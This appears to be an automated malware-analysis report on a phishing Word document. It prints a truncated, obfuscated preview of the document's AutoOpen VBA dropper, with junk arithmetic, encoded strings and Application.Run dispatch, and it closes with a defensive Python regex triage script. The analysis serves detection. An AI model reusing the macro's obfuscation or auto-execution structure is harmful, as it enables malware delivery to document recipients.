Verdict: MALICIOUS (risk score 242)
Malware Insights

MITRE ATT&CK (as tagged by the analyzer):
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution. Note: nothing in the findings below points to a parser vulnerability; the macro runs only once the recipient enables macros, which T1204.002 User Execution: Malicious File describes more precisely.
The sample is a malicious Word (OLE) document carrying a VBA project whose AutoOpen subroutine runs as soon as the document is opened with macros enabled. The macro is heavily obfuscated: each procedure starts with On Error Resume Next and then pads its body with junk arithmetic over undeclared variables wrapped in Log(), Int(), Hex(), ChrW(), CByte() and CLng(), so the resulting type and domain errors are silently swallowed; the strings it actually needs are stored as runs of numeric tokens separated by junk characters and sliced out with Mid(); and control is transferred by name through Application.Run, which hides the real call graph from a plain read of the source (the second argument, nSZOQJfWcU, is itself a Function that is evaluated while building the call). The analyzer reports a Shell() call in the VBA, i.e. an attempt to launch a secondary payload outside Office; that call lies beyond the truncated preview shown below. ClamAV independently flags the file as Img.Dropper.PhishingLure-6443153-0, consistent with a phishing-lure dropper.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Here the source was recovered as well, so this finding corroborates the source-level AutoOpen and Shell() findings rather than standing alone.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: a 90 KB VBA project was in fact extracted from this sample (see below), so the marker matched here is almost certainly the AutoOpen name of that project and adds no independent evidence.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). Note: this is the DrawingML XML namespace URI that appears in ordinary Office drawing markup; it is an identifier, not an address the document contacts, and is not an indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 90347 bytes | 50caf1fbf8a592c17f69d2998b01ef8e91f5f2b3b84e5964a6fabda73f797996 |

Preview: first 1,000 lines of the extracted script (the listing is truncated). olevba concatenates modules, so the preview shows the attribute header of the ThisDocument class module followed by the standard module PdjPVCzmNBNTd that holds AutoOpen.
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "PdjPVCzmNBNTd"
Sub AutoOpen()
On Error Resume Next
MAADDGfXo = 8260205 + pcXAStvjJj - OPIb2 / Log(JuRzXdqz / Int(ENwDrYswibTc) - 9638617 * qJBkuirTOXCrF) / Qnf + Hex(FiBhqHQciTJt) / (zAiMhLE - Int(nWtvTrkwbBA) - 3711518 * ChrW(1146562 / AalmqZNfiaAdu + jKVfALRLH - CByte(7243624 + CLng(4505799 + ChrW(3006776) - 6206330 - Chr(DSJauEAHavU)))))
fMIoTvpzR = 3466554 + jUStboSAO - OPIb2 / Log(sjcPRZiqSYj / Int(LVzIXoqiSOM) - 7413527 * pIAcMoajtmdj) / Qnf + Hex(BVGHztjFIz) / (SQiJjIiXpdcRiN - Int(kJuRiVc) - 9833376 * ChrW(7507226 / bKPTFjjKGJ + KQzkIFquZDYtsI - CByte(4498753 + CLng(2273621 + ChrW(8311802) - 2892991 - Chr(qRroEwOEjz)))))
vHcDLZtuj = 5021939 + lENRDQWKi - OPIb2 / Log(pvhTdTbvmt / Int(Hwdvwqh) - 6728932 * RKoIENdWAhr) / Qnf + Hex(BdGMujiGRzujOi) / (kWHapbDC - Int(GYPQpFuFCHF) - 3622384 * ChrW(4301539 / BGwcNSQItaEs + sGBSzac - CByte(1063768 + CLng(4255364 + ChrW(3949223) - 3515566 - Chr(LFoiHZpOm)))))
GTqwqkOzi = 7895211 + wEBwAoHr - OPIb2 / Log(ifmjLBMbimAPiO / Int(nKTGpNHrfHUG) - 699411 * dSRzUIbhKnpXm) / Qnf + Hex(sovSqOKpUA) / (jWnGZru - Int(lATjSKFL) - 1204016 * ChrW(86688 / RSaozrLBQof + wRvnlnalwvOBT - CByte(4772532 + CLng(958855 + ChrW(5601983) - 1492956 - Chr(DEoojjFioPNp)))))
Application.Run "RXWidOVZji", nSZOQJfWcU
iUFLVSWXU = 4655326 + PjVDZUamiuf - OPIb2 / Log(azJhLhCwKXHR / Int(vHDmGkQfYZFNjj) - 2651366 * divwjfMLk) / Qnf + Hex(pRZUrbDJ) / (NWzcJPGBZET - Int(BokhsMSLQus) - 418809 * ChrW(8990525 / wFDhdJWDArdClj + dmGRjocpnzP - CByte(7148097 + CLng(9715730 + ChrW(2443260) - 3566703 - Chr(zhOQAzsbJIz)))))
osEqajinI = 7409692 + OGVPQiOYYqhO - OPIb2 / Log(UXTbfuiHXqo / Int(jIoCQZJrMTHulh) - 1801847 * kkHHiXVDP) / Qnf + Hex(HOHdqQhS) / (aaWIRXWUBQYq - Int(kRWnjhTLmkmJRv) - 6827357 * ChrW(6646495 / rNSzjmOcpjH + UnrPJdq - CByte(1347798 + CLng(600191 + ChrW(6290140) - 80541 - Chr(WnpkwzbnlYZKYw)))))
BiILtzMHR = 9476587 + tHStbZKNTcvzdd - OPIb2 / Log(HTRvOhrKbLwrn / Int(nOVsqFs) - 1844152 * KzOzEVGhfhDqsp) / Qnf + Hex(jNBwqidhXK) / (OZFnYzzZHwz - Int(noViTJjMuYzJ) - 5584485 * ChrW(674366 / SLjRrnYHjbrJFs + hZjdOIVDJ - CByte(4595046 + CLng(7659597 + ChrW(9681338) - 7261648 - Chr(ZwKUCiNafHwOh)))))
oCbAdTbqa = 4901879 + omzIXtDomRGfho - OPIb2 / Log(NEHtbhA / Int(jBiXKfJwzWK) - 6150443 * hFDlEHbPi) / Qnf + Hex(tLbFXjjzRo) / (QGpWtJcS - Int(JWImjzDI) - 4556238 * ChrW(5113734 / LwioLiZmPS + trERwOPKzz - CByte(9297696 + CLng(5139574 + ChrW(2604504) - 4449958 - Chr(oZXjYZq)))))
End Sub
Function nSZOQJfWcU()
On Error Resume Next
IOCki = ("Zu3Hw856:164V73K44@116:123:102R40I75:40s44:156s163:141:144V141K163s144s56c156I145V170_164R50@61g60c60c60g60R54g40@62K70R62I61:63I63R51R73K44@101c104:103g130R40g75_40_47g15g12IMnk015NNPF769qqG2ZjJI0G")
PZzZpaX = 7128153 + UKwYEnfIzprq - OPIb2 / Log(TLDIkMcirlzpX / Int(PjRfzvYPaWwQ) - 1249444 * OKhYNIHJCnzi) / Qnf + Hex(BcYwjhFQ) / (iKruRDlhLT - Int(vQhEZbP) - 5061467 * ChrW(1028466 / ifRnWmBXNjBQ + bXjSqDYVbjcNl - CByte(9127304 + CLng(3913514 + ChrW(4919690) - 1467856 - Chr(fKsEiaHvR)))))
MfjrHGh = 6928203 + wjEiaFhs - OPIb2 / Log(YWhLCzoa / Int(qhwFRVGwXsGL) - 9089293 * oLdwXiKpnhwt) / Qnf + Hex(dhBflhKa) / (LsSiYdi - Int(mzdkszZCRraBu) - 3212024 * ChrW(1322528 / NcPVMUikLl + kioKjHwvBPYkhc - CByte(5527533 + CLng(3866337 + ChrW(8032300) - 6942212 - Chr(IultVvOMbR)))))
dqcPMzYbT = Mid(IOCki, 7, 169)
OtckXlcT = ("MJ1joP1XMlZvEB6J0k2uZHm1ZrSDs166K157c47_53V47s153g47I53I47s145g55s111g164s14WwSIq6paTRu")
SNvNf = 959771 + PNJPcquZaz - OPIb2 / Log(zuTFOTEE / Int(jiWXcJfaLuCpuS) - 5099489 * DwfHnFoRQ) / Qnf + Hex(dpjHaaOGqjqmm) / (KTOjvSFct - Int(LXYwLduEHojq) - 8205679 * ChrW(626297 / bboctbQJNz + rIWzjAwzw - CByte(674811 + CLng(325972 + ChrW(3469624) - 9017383 - Chr(mlfwlUdK)))))
SWzTr = 2414529 + rQAzLuNLzr - OPIb2 / Log(liJFfutGQZIt / Int(HplKccqhv) - 468905 * SAwm
```
... (truncated)
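The heuristics above (auto-exec entry point, Shell() call, error suppression, junk arithmetic, encoded string constants, Application.Run dispatch) can be reproduced on the decoded source with a few regexes. The script below is an added example for this report, not the analyzer's own heuristic engine and not code from the sample. Its input is a constructed module: the first lines of the preview, trimmed, plus a made-up `Shell` line standing in for the call that lies beyond the truncated preview. The pattern names, the junk-arithmetic thresholds (at least 6 operators and 3 numeric-conversion calls on one line), the encoded-string thresholds (at least 10 numeric tokens, digits at least half the literal) and the score weights are all assumptions chosen for illustration.

```python
"""Static triage of a decoded VBA module for the indicators this report lists.

Stand-alone example, not the analyzer's own heuristics: entry-point names,
execution and dispatch calls, junk-arithmetic density and encoded string
constants are checked with plain regexes over olevba-style source text.
"""
import json
import re

# Constructed input: first lines of the macros.bas preview, trimmed, plus a
# made-up 'Shell' line standing in for the call beyond the truncated preview.
SAMPLE_VBA = r'''Attribute VB_Name = "PdjPVCzmNBNTd"
Sub AutoOpen()
On Error Resume Next
MAADDGfXo = 8260205 + pcXAStvjJj - OPIb2 / Log(JuRzXdqz / Int(ENwDrYswibTc) - 9638617 * qJBkuirTOXCrF) / Qnf + Hex(FiBhqHQciTJt)
Application.Run "RXWidOVZji", nSZOQJfWcU
End Sub
Function nSZOQJfWcU()
On Error Resume Next
IOCki = ("Zu3Hw856:164V73K44@116:123:102R40I75:40s44:156s163:141:144V141K163s144s56c156I145V170_164R50@61g60c60")
dqcPMzYbT = Mid(IOCki, 7, 169)
Shell dqcPMzYbT, vbHide
End Function
'''

# Word/Excel procedure names that run without a click once macros are enabled.
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+'
    r'(AutoOpen|AutoExec|AutoNew|AutoClose|Document_Open|Document_Close|'
    r'Workbook_Open|Auto_Open)\s*\(', re.I | re.M)

SUSPICIOUS_RE = {
    'shell_exec': re.compile(r'\b(?:Shell|CreateObject|GetObject|WScript\.Shell)\b', re.I),
    'dynamic_dispatch': re.compile(r'\bApplication\.Run\b', re.I),
    'error_suppression': re.compile(r'\bOn\s+Error\s+Resume\s+Next\b', re.I),
    'string_slicing': re.compile(r'\b(?:Mid|Left|Right|StrReverse)\s*\(', re.I),
}

# Junk arithmetic: long expressions over undeclared names wrapped in numeric
# conversion calls; every runtime error is swallowed by On Error Resume Next.
JUNK_CALL_RE = re.compile(r'\b(?:Log|Int|Hex|ChrW|Chr|CByte|CLng)\s*\(', re.I)
ARITH_RE = re.compile(r'[-+*/]')
STRING_RE = re.compile(r'"([^"\n]{24,})"')


def is_junk_arithmetic(line, min_ops=6, min_calls=3):
    """Assumed thresholds: 6 arithmetic operators and 3 conversion calls on one line."""
    return (len(ARITH_RE.findall(line)) >= min_ops
            and len(JUNK_CALL_RE.findall(line)) >= min_calls)


def looks_encoded(literal, min_tokens=10, min_digit_ratio=0.5):
    """Numeric tokens separated by single junk characters, e.g. 856:164V73K44@116."""
    tokens = re.findall(r'\d+', literal)
    digit_ratio = sum(len(t) for t in tokens) / len(literal)
    return len(tokens) >= min_tokens and digit_ratio >= min_digit_ratio


def triage(vba_source):
    """Return the indicator counts, an assumed weighted score and a verdict."""
    lines = vba_source.splitlines()
    report = {
        'autoexec': AUTOEXEC_RE.findall(vba_source),
        'hits': {name: len(rx.findall(vba_source)) for name, rx in SUSPICIOUS_RE.items()},
        'junk_lines': sum(1 for ln in lines if is_junk_arithmetic(ln)),
        'encoded_strings': [s for s in STRING_RE.findall(vba_source) if looks_encoded(s)],
    }
    # Assumed weights: an auto-exec entry point plus an execution call dominate.
    score = (3 * bool(report['autoexec'])
             + 3 * bool(report['hits']['shell_exec'])
             + 2 * bool(report['hits']['dynamic_dispatch'])
             + 1 * bool(report['hits']['error_suppression'])
             + 2 * bool(report['junk_lines'])
             + 2 * bool(report['encoded_strings']))
    report['score'] = score
    if report['autoexec'] and score >= 8:
        report['verdict'] = 'malicious'
    elif score >= 4:
        report['verdict'] = 'suspicious'
    else:
        report['verdict'] = 'clean'
    return report


if __name__ == '__main__':
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Run it against the real macros.bas by passing the file's contents to `triage()`; the Shell() finding will then come from the sample itself rather than the stand-in line. The Application.Run match is worth keeping separate from the Shell match: a name-based dispatch defeats call-graph extraction, so a module with only Application.Run and encoded strings still deserves a sandbox run even when no Shell token is visible in the recovered source.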